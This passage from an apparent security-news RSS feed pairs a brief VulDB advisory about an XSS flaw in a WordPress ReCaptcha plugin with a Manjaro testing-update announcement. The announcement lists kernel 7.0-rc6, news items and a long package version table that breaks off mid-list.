<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/wedevs:recaptcha_integration_plugin">weDevs ReCaptcha Integration Plugin up to 1.2.5</a> on WordPress. This affects an unknown function. This manipulation causes cross site scripting.

This vulnerability is registered as <a href="https://vuldb.com/source_cve/272006">CVE-2024-37946</a>. Remote exploitation of the attack is possible. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-03-31 - Linux 7.0-rc6, Thunderbird, Deepin, Freecad, Wireplumber, haskell]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. This might mark the start of the development cycle of the upcoming ‘Bian-May’ release series. With this we aim to update the default kernel to 7.0 series. Also there will be Plasma 6.6 series, KDE Gears 26.04 and GNOME 50 ...]]></description>
<link>https://tsecurity.de/de/3394814/unix-server/testing-update-2026-03-31-linux-70-rc6-thunderbird-deepin-freecad-wireplumber-haskell/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3394814/unix-server/testing-update-2026-03-31-linux-70-rc6-thunderbird-deepin-freecad-wireplumber-haskell/</guid>
<pubDate>Tue, 31 Mar 2026 06:00:52 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. This might mark the start of the development cycle of the upcoming ‘Bian-May’ release series. With this we aim to update the default kernel to <a href="https://www.heise.de/en/news/Linux-Torvalds-starts-development-of-Kernel-7-0-11186358.html">7.0</a> series. Also there will be <a href="https://kde.org/announcements/plasma/6/6.6.0/">Plasma 6.6</a> series, <a href="https://community.kde.org/Schedules/KDE_Gear_26.04_Schedule">KDE Gears 26.04</a> and <a href="https://release.gnome.org/50/">GNOME 50</a> release series. XFCE will stay at <a href="https://www.xfce.org/about/tour420">4.20</a> this release cycle. A release of ‘Bian-May’ can be expected end of April, beginning of May. Let us know any issues you may found thus far …</p>
<h3><a name="p-850257-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-850257-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-850257-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-850257-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-thunderbird-deepin-freecad-wireplumber-haskell/186720/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-thunderbird-deepin-freecad-wireplumber-haskell/186720/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-thunderbird-deepin-freecad-wireplumber-haskell/186720/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-thunderbird-deepin-freecad-wireplumber-haskell/186720/1">(click for more details)</a>
<h2><a name="p-850257-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-850257-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li><strong>Kernel</strong> 7.0 got updated to <a href="https://lore.kernel.org/lkml/CAHk-=wgLvq1LucHhxjiPwDBkMRk=54Zh=-FmUdevXJyHygc=9A@mail.gmail.com/T/#u">7.0-rc6</a></li>
<li><strong>Thunderbird</strong> <a href="https://www.thunderbird.net/thunderbird/149.0.1/releasenotes/">149.0.1</a></li>
<li>Some updates to <strong>Deepin</strong></li>
<li><strong>freecad</strong> <a href="https://blog.freecad.org/2026/03/25/freecad-version-1-1-released/">1.1.0</a></li>
<li>Rebuilds and updates to <strong>haskell</strong></li>
<li><strong>wireplumber</strong> <a href="https://gitlab.com/pipewire/wireplumber/-/blob/07e730b279ac7a520699ae9f6b0797848a731b30/NEWS.rst">0.5.14</a></li>
</ul>
<h2><a name="p-850257-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-850257-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-thunderbird-deepin-freecad-wireplumber-haskell/186720/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-thunderbird-deepin-freecad-wireplumber-haskell/186720/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux510 5.10.252</li>
<li>linux515 5.15.202</li>
<li>linux61 6.1.167</li>
<li>linux66 6.6.130</li>
<li>linux612 6.12.78</li>
<li>linux618 6.18.20</li>
<li>linux619 6.19.10</li>
<li>linux70 7.0.0rc6</li>
<li>linux61-rt 6.1.166_rt61</li>
<li>linux66-rt 6.6.129_rt70</li>
<li>linux612-rt 6.12.74_rt16</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (3/31/26 05:17 CEST)</p>
<ul>
<li>testing core x86_64:  3 new and 3 removed package(s)</li>
<li>testing extra x86_64:  1131 new and 1127 removed package(s)</li>
<li>testing multilib x86_64:  8 new and 8 removed package(s)</li>
</ul>
<pre><code class="lang-auto">:: Different overlay package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                             linux70           7.0.0rc5-1           7.0.0rc6-1
                     linux70-headers           7.0.0rc5-1           7.0.0rc6-1


:: Different sync package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                                file               5.47-1               5.47-2


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                             discord          1:0.0.131-1                    -
                   linux70-acpi_call            1.2.2-0.5            1.2.2-0.6
                    linux70-bbswitch              0.8-0.5              0.8-0.6
                 linux70-broadcom-wl     6.30.223.271-0.5     6.30.223.271-0.6
                linux70-nvidia-470xx       470.256.02-0.5       470.256.02-0.6
                 linux70-nvidia-open        595.58.03-0.1        595.58.03-0.2
                       linux70-r8168         8.056.02-0.5         8.056.02-0.6
                   linux70-rtl8723bu         20250813-0.5         20250813-0.6
                    linux70-tp_smapi             0.45-0.5             0.45-0.6
                 linux70-vhba-module         20250329-0.5         20250329-0.6
     linux70-virtualbox-host-modules            7.2.6-0.5            7.2.6-0.6
                         linux70-zfs            2.4.1-0.5            2.4.1-0.6


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                          abseil-cpp         20250814.1-1         20260107.1-1
                               afl++              4.35c-2              4.40c-1
                                agda          2.6.4.3-119          2.6.4.3-121
                          aliyun-cli              3.2.9-1              3.3.3-1
                              allure         0.11.0.0-317         0.11.0.0-320
                          amdgpu_top             0.11.2-1             0.11.3-1
                       android-tools            35.0.2-23            35.0.2-24
                          apache-orc              2.3.0-2              2.3.0-3
                                apko             1.1.16-1              1.2.0-1
                               arbtt         0.12.0.3-185         0.12.0.3-187
                             arch-hs            0.12.1-66            0.12.1-70
                      argo-workflows              4.0.2-1              4.0.3-1
                               arrow             23.0.1-2             23.0.1-3
                             astroid               0.17-8               0.17-9
                           astroterm             1.0.10-1              1.1.0-1
                           aws-vault              7.9.7-1             7.9.13-1
                              azcopy            10.32.1-1            10.32.2-1
                       bbswitch-dkms              0.8-806              0.8-807
                       bcachefs-dkms           3:1.37.3-1           3:1.37.4-1
                      bcachefs-tools           3:1.37.3-1           3:1.37.4-1
                               beets              2.7.1-1              2.8.0-1
                               bftpd                6.3-1                6.6-1
                              bloaty               1.1-22               1.1-23
                            bpftrace             0.25.0-1             0.25.1-1
                                brat              0.9.0-2             0.10.0-1
                                 bun             1.3.11-1             1.3.11-2
                               byobu               6.14-1               6.15-1
                       cabal-install          3.10.3.0-15          3.10.3.0-18
                          cabal-plan          0.7.3.0-128          0.7.3.0-130
                      cargo-binstall             1.17.8-2             1.17.9-1
                         cargo-insta             1.47.0-1             1.47.2-1
                        cargo-update             18.2.0-2             19.0.1-1
                             castxml              0.7.0-1              0.7.0-2
                           cbor-tool          0.2.3.0-124          0.2.3.0-126
                              ccache             4.13.1-1             4.13.2-1
                               cgrep             8.1.0-94             8.1.0-97
                              chatty              0.8.9-1              0.8.9-2
                          cherrytree              1.6.3-1              1.6.3-2
                           clash-ghc             1.8.2-97            1.8.2-100
                          cockatrice             2.10.3-1             2.10.3-2
                               crash              9.0.1-1              9.0.1-2
                             cryptol             3.3.0-47             3.3.0-50
                                 cue             0.15.4-1             0.16.0-1
                    curl-impersonate              1.5.1-1              1.5.2-1
                                cyme             2.2.11-2              2.3.0-1
                               darcs           2.18.5-191           2.18.5-194
                             dbeaver             26.0.0-1             26.0.1-1
                     deepin-anything             6.2.11-1              7.0.0-2
                deepin-anything-dkms             6.2.11-1              7.0.0-2
                          deepin-api             6.0.35-1             6.0.37-1
                 deepin-app-services             1.0.40-1             1.0.41-1
          deepin-application-manager             1.2.42-1             1.2.44-1
                     deepin-calendar             6.5.17-1             6.5.18-1
                    deepin-clipboard              6.1.7-1              6.1.8-1
                   deepin-compressor              6.5.9-1             6.5.11-1
               deepin-control-center             6.1.13-1             6.1.15-1
                       deepin-daemon             6.1.46-4             6.1.49-1
                deepin-desktop-theme             1.1.16-1             1.1.18-1
             deepin-device-formatter           0.0.1.18-2              1.5.1-1
                         deepin-draw             6.5.25-1             6.5.26-1
                       deepin-editor             6.5.41-1             6.5.42-1
                 deepin-grand-search              5.4.7-3              5.4.9-1
                    deepin-launchpad             2.0.25-3             2.0.26-1
                        deepin-movie          1:5.10.45-1          1:5.10.46-1
                 deepin-network-core             2.0.42-1             2.0.43-1
               deepin-qt5integration             5.7.30-2             6.7.31-1
          deepin-qt5platform-plugins             5.7.30-2             6.7.31-1
               deepin-qt6integration             6.0.48-3             6.7.31-1
          deepin-qt6platform-plugins             6.0.48-3             6.7.31-1
                  deepin-screensaver             5.0.19-2             5.0.20-1
                     deepin-services             1.0.19-1             1.0.21-1
                      deepin-session             2.0.15-2             2.0.17-1
                        deepin-shell             2.0.27-3             2.0.29-1
               deepin-system-monitor             6.5.19-2             6.5.21-1
                     deepin-terminal             6.5.28-3             6.5.29-1
                  deepin-tray-loader             2.0.24-3             2.0.26-1
                        deepin-turbo            0.0.6.2-1            0.0.6.3-1
                     deepin-util-dfm             1.2.29-1             1.2.31-1
                   deepin-wallpapers            1:1.7.8-1           1:1.7.14-1
                      deepin-widgets             6.0.18-2             6.0.20-1
                               dhall            1.42.3-45            1.42.3-48
                          dhall-bash           1.0.41-176           1.0.41-180
                          dhall-docs           1.0.12-168           1.0.12-171
                          dhall-json           1.7.12-172           1.7.12-175
                    dhall-lsp-server            1.1.4-102            1.1.4-106
                          dhall-yaml           1.2.12-177           1.2.12-180
                       diff-so-fancy              1.4.6-1              1.4.8-1
                          diffoscope                313-1                315-1
                             discord          1:0.0.130-1          1:0.0.131-1
                             dovecot              2.4.3-1              2.4.3-2
                               drone             2.28.0-1             2.28.1-1
                           drone-oss             2.28.0-1             2.28.1-1
                            dtk6core           1:6.7.32-2           1:6.7.33-1
                     dtk6declarative           1:6.7.32-2           1:6.7.33-1
                             dtk6gui           1:6.7.32-2           1:6.7.33-1
                             dtk6log             6.7.32-2             6.7.33-1
                          dtk6widget           1:6.7.32-2           1:6.7.33-1
                             dtkcore           1:6.7.32-2           1:6.7.33-1
                      dtkdeclarative           1:6.7.32-2           1:6.7.33-1
                              dtkgui           1:6.7.32-2           1:6.7.33-1
                              dtklog             6.7.32-2             6.7.33-1
                           dtkwidget           1:6.7.32-2           1:6.7.33-1
                               dunst             1.13.1-1             1.13.2-1
                         easyeffects              8.1.7-1              8.1.8-1
                              emptty             0.16.0-1             0.16.1-1
               evolution-data-server             3.58.3-1             3.58.3-2
          evolution-data-server-docs             3.58.3-1             3.58.3-2
                  falcosecurity-libs             0.20.0-9             0.23.1-1
                           fastfetch             2.60.0-1             2.61.0-1
           firefox-developer-edition            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-ach            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-af            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-an            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ar            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-ast            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-az            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-be            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-bg            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-bn            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-br            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-bs            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ca            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-ca-valencia      150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-cak            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-cs            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-cy            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-da            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-de            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-dsb            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-el            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-en-ca            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-en-gb            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-en-us            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-eo            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-es-ar            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-es-cl            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-es-es            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-es-mx            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-et            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-eu            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-fa            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ff            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-fi            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-fr            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-fur            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-fy-nl            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-ga-ie            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-gd            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-gl            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-gn            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-gu-in            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-he            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-hi-in            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-hr            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-hsb            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-hu            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-hy-am            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ia            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-id            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-is            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-it            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ja            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ka            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-kab            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-kk            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-km            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-kn            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ko            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-lij            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-lt            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-lv            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-mk            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-mr            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ms            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-my            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-nb-no            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-ne-np            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-nl            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-nn-no            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-oc            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-pa-in            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-pl            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-pt-br            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-pt-pt            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-rm            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ro            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ru            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-sat            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sc            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-sco            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-si            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sk            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-skr            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sl            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-son            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sq            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sr            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-sv-se            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-szl            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ta            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-te            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-tg            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-th            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-tl            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-tr            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-trs            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-uk            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ur            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-uz            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-vi            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-xh            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-zh-cn            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-zh-tw            150.0b2-1            150.0b3-1
                             freecad             1.0.2-10              1.1.0-2
                      freeciv-common              3.2.2-6              3.2.4-1
                        freeciv-gtk3              3.2.2-6              3.2.4-1
                        freeciv-gtk4              3.2.2-6              3.2.4-1
                          freeciv-qt              3.2.2-6              3.2.4-1
                           ft2-clone               2.12-1               2.13-1
                                 gdb               17.1-2               17.1-3
                          gdb-common               17.1-2               17.1-3
                                gegl             0.4.68-1             0.4.70-1
                          gemini-cli           1:0.35.2-1           1:0.35.3-1
                                gimp              3.2.0-1              3.2.2-1
                           git-annex       10.20251215-14       10.20251215-19
                           git-delta             0.19.1-1             0.19.2-1
                          git-repair       1.20230814-189       1.20230814-190
                               gitit         0.15.1.2-121         0.15.1.2-127
                             glances              4.5.2-2              4.5.3-1
                               glirc            2.40.1-70            2.40.1-74
           globalprotect-openconnect              2.5.1-2              2.5.1-3
                                  gn    0.2324.304bbef6-1    0.2324.304bbef6-2
                      gnuradio-iqbal             0.38.3-2             0.38.3-3
                       golangci-lint             2.11.3-1             2.11.4-1
                         google-glog              0.7.1-1              0.7.1-2
                                grpc             1.78.1-2             1.80.0-1
                            grpc-cli             1.78.1-2             1.80.0-1
                                gvim           9.2.0204-2           9.2.0272-1
                              hamlib              4.6.5-3              4.7.0-1
                           hardinfo2             2.2.16-1             2.2.16-2
                 haskell-adjunctions            4.4.3-102              4.4.4-1
                       haskell-aeson            2.2.1.0-5            2.2.1.0-7
         haskell-aeson-better-errors           0.9.1.3-73           0.9.1.3-75
                haskell-aeson-casing          0.2.0.0-233          0.2.0.0-235
                  haskell-aeson-diff         1.1.0.13-267         1.1.0.13-269
                haskell-aeson-pretty           0.8.10-150           0.8.10-152
                    haskell-aeson-qq            0.8.4-335            0.8.4-337
        haskell-aeson-warning-parser             0.1.1-89             0.1.1-91
                  haskell-aeson-yaml          1.1.0.1-349          1.1.0.1-351
                haskell-apply-refact          0.14.0.0-63          0.14.0.0-64
                    haskell-arch-web             0.3.2-54             0.3.2-58
                    haskell-arithmoi          0.13.2.0-32          0.13.2.0-35
            haskell-attoparsec-aeson            2.2.0.0-7            2.2.0.0-9
                haskell-authenticate          1.3.5.2-250          1.3.5.2-253
          haskell-authenticate-oauth              1.7-373              1.7-375
                         haskell-aws             0.24.2-9            0.24.2-12
              haskell-binary-conduit            1.3.1-588            1.3.1-590
            haskell-binary-instances            1.0.4-161            1.0.4-163
               haskell-binary-tagged            0.3.1-332            0.3.1-334
                      haskell-bitvec           1.1.5.0-43           1.1.5.0-45
                  haskell-bower-json          1.1.0.0-229          1.1.0.0-231
                  haskell-breakpoint           0.1.4.0-20            0.1.5.0-1
                     haskell-butcher          1.3.3.2-508          1.3.3.2-510
                    haskell-bv-sized             1.0.6-96             1.0.6-99
                  haskell-byte-order          0.1.3.1-161          0.1.3.1-163
   haskell-bytestring-strict-builder           0.4.5.8-76           0.4.5.8-78
       haskell-cabal-install-parsers           0.6.1.1-12           0.6.1.1-16
                 haskell-casa-client             0.0.3-32             0.0.3-36
                  haskell-casa-types             0.0.3-24             0.0.3-27
                       haskell-cborg          0.2.10.0-86          0.2.10.0-88
                  haskell-cborg-json          0.2.6.0-101          0.2.6.0-103
                  haskell-cheapskate          0.1.1.2-861          0.1.1.2-864
                    haskell-checkers            0.6.0-257            0.6.0-258
                     haskell-chimera          0.4.1.0-144          0.4.1.0-146
                          haskell-ci            0.16.6-48            0.16.6-52
                    haskell-citeproc           0.8.1.1-84           0.8.1.1-86
                   haskell-clash-lib             1.8.2-97            1.8.2-100
               haskell-clash-prelude             1.8.2-89             1.8.2-92
              haskell-classy-prelude           1.5.0.3-81           1.5.0.3-84
                haskell-coinbase-pro          0.9.3.2-435          0.9.3.2-439
       haskell-commonmark-extensions            0.2.5.6-5            0.2.5.6-6
           haskell-commonmark-pandoc           0.2.2.3-46           0.2.2.3-48
                     haskell-concise          0.1.0.1-660          0.1.0.1-662
                     haskell-conduit          1.3.6.1-133          1.3.6.1-135
               haskell-conduit-extra             1.3.8-76             1.3.8-78
               haskell-conduit-parse          0.2.1.1-311          0.2.1.1-313
               haskell-config-schema          1.3.0.0-234          1.3.0.0-236
          haskell-constraints-extras           0.4.0.2-54           0.4.0.2-56
               haskell-contravariant              1.5.5-6              1.5.6-1
        haskell-contravariant-extras            0.3.5.4-6            0.3.5.4-7
                   haskell-criterion           1.6.3.0-47           1.6.3.0-49
       haskell-criterion-measurement           0.2.3.0-57           0.2.3.0-59
             haskell-crypton-conduit            0.2.3-219            0.2.3-221
          haskell-crypton-connection             0.4.5-26             0.4.5-28
          haskell-cryptonite-conduit            0.2.2-792            0.2.2-794
                         haskell-dav            1.3.4-874            1.3.4-879
                        haskell-dbus             1.3.3-73             1.3.3-76
               haskell-dbus-hslogger          0.1.0.1-676          0.1.0.1-679
              haskell-deferred-folds           0.9.18.8-2           0.9.18.8-4
        haskell-dense-linear-algebra          0.1.0.0-444          0.1.0.0-446
               haskell-dependent-map            0.4.0.1-9           0.4.0.1-11
               haskell-dependent-sum          0.7.2.0-219          0.7.2.0-221
      haskell-dependent-sum-template           0.2.0.2-17           0.2.0.2-19
                       haskell-deque          0.4.4.2-114          0.4.4.2-116
              haskell-deriving-aeson           0.2.10-131           0.2.10-133
                      haskell-docopt          0.7.0.8-151          0.7.0.8-153
                haskell-doctemplates          0.11.0.1-76          0.11.0.1-78
            haskell-doctest-discover          0.2.0.0-213          0.2.0.0-215
                      haskell-either             5.0.3-79             5.0.3-80
                  haskell-enummapset          0.7.3.0-139          0.7.3.0-141
                   haskell-esqueleto           3.5.11.0-8           3.5.11.1-4
                  haskell-fdo-notify            0.3.1-922            0.3.1-925
                        haskell-feed          1.3.2.1-330          1.3.2.1-332
                    haskell-floskell           0.10.8-189           0.10.8-191
                       haskell-focus          1.0.3.2-186          1.0.3.2-188
                       haskell-foldl            1.4.18-93            1.4.18-94
                    haskell-fourmolu           0.13.1.0-5           0.14.0.0-2
                        haskell-free              5.2-124              5.2-125
                    haskell-fsnotify           0.4.4.0-40           0.4.4.0-42
                haskell-generic-data           1.1.0.2-66           1.1.0.2-68
                haskell-generic-lens          2.2.2.0-200          2.2.2.0-202
                   haskell-ghc-check          0.5.0.8-150          0.5.0.8-151
              haskell-ghc-exactprint            1.7.1.0-9           1.7.1.0-10
                      haskell-ghcide           2.2.0.0-16            2.3.0.0-5
           haskell-ghcide-test-utils          1.9.0.0-292          1.9.0.0-299
                          haskell-gi           0.26.16-10           0.26.16-12
                      haskell-gi-atk            2.0.28-38            2.0.28-40
                    haskell-gi-cairo            1.0.30-31            1.0.30-33
          haskell-gi-cairo-connector            0.1.1-313            0.1.1-315
                 haskell-gi-dbusmenu            0.4.14-33            0.4.14-35
             haskell-gi-dbusmenugtk3           0.4.15-130           0.4.15-132
                haskell-gi-freetype2             2.0.5-41             2.0.5-43
                      haskell-gi-gdk            4.0.9-106            4.0.9-108
                     haskell-gi-gdk3            3.0.29-30            3.0.29-32
                  haskell-gi-gdk3x11             3.0.15-6             3.0.16-1
                haskell-gi-gdkpixbuf           2.0.32-142           2.0.32-144
                   haskell-gi-gdkx11            4.0.8-129            4.0.8-131
                      haskell-gi-gio            2.0.38-25            2.0.38-27
                     haskell-gi-glib            2.0.30-59            2.0.30-61
                  haskell-gi-gmodule             2.0.6-43             2.0.6-45
                  haskell-gi-gobject            2.0.31-75            2.0.31-77
                 haskell-gi-graphene             1.0.8-68             1.0.8-70
                      haskell-gi-gsk             4.0.8-55             4.0.8-57
                      haskell-gi-gtk            4.0.11-32            4.0.11-34
                   haskell-gi-gtk-hs           0.3.17-101           0.3.17-103
                     haskell-gi-gtk3            3.0.43-13            3.0.43-15
                 haskell-gi-harfbuzz           0.0.10-147           0.0.10-149
                    haskell-gi-pango            1.0.30-36            1.0.30-38
                     haskell-gi-xlib            2.0.14-93            2.0.14-95
                     haskell-git-lfs             1.2.5-78             1.2.5-81
                     haskell-githash          0.1.6.3-345          0.1.6.3-348
                haskell-gtk-sni-tray          0.1.8.1-394          0.1.8.1-397
                   haskell-gtk-strut          0.1.3.2-348          0.1.3.2-350
                  haskell-hackage-db            2.1.3-191            2.1.3-193
            haskell-hackage-security           0.6.3.2-13           0.6.3.2-15
             haskell-haddock-library           1.11.0-184           1.11.0-188
                     haskell-hadrian     0.1.0.0+9.6.6-16     0.1.0.0+9.6.6-19
                      haskell-hakyll          4.16.4.0-25          4.16.4.0-31
            haskell-happstack-server             7.9.3-24             7.9.3-25
                       haskell-hasql          1.5.0.5-114            1.6.1.1-2
    haskell-hasql-dynamic-statements          0.3.1.1-280            0.3.1.2-2
             haskell-hasql-implicits          0.1.0.5-316          0.1.0.5-320
         haskell-hasql-notifications           0.2.0.5-89           0.2.0.5-93
                  haskell-hasql-pool          0.5.2.2-399            0.8.0.2-2
           haskell-hasql-transaction          1.0.1.1-421            1.0.1.2-2
            haskell-hedgehog-classes          0.2.5.4-216          0.2.5.4-218
                        haskell-here           1.2.14-135           1.2.14-136
                    haskell-hie-bios           0.12.0-159           0.12.0-161
                 haskell-hledger-lib               1.52-6               1.52-8
